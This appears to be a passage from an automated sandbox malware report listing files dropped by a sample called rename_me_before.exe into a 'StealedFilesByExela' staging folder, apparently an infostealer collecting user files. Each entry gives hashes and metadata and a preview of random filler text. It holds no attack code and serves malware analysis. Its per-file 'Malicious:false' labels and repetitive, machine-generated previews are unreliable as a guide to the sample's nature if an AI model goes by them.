                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\VLZDGUKUTZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\WKXEWIOTXI.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                                          MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                                          SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                                          SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                                          SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\WUTJSCBCFX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\XZXHAVGRAG.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\HTAGVDFUIE.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\KZWFNRXYKI.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\LTKMYBSEYZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\UMMBDNEQBN.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
